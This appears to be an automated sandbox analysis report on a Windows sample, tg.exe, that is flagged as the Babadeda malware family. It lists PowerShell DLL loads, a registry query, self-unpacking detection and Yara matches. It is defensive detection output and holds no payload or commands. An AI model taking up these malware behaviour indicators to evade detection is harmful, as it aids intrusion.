Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\tg.exe

Unpacked PE file: 0.2.tg.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: tg.exe, type: SAMPLE
Source: Yara match	File source: 0.2.tg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.tg.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\tg.exe

Code function: 0_2_0040A83A LoadLibraryW,GetProcAddress,wcscpy,wcscat,wcslen,CoTaskMemFree,FreeLibrary,wcscat,wcslen,

0_2_0040A83A

Source: tg.exe

Static PE information: section name: .code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9BAB4855 pushad ; iretd	13_2_00007FFD9BAB4861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9BAB2325 push eax; iretd	13_2_00007FFD9BAB233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9BABCA58 pushad ; ret	13_2_00007FFD9BABCBB1

Source: C:\Users\user\Desktop\tg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
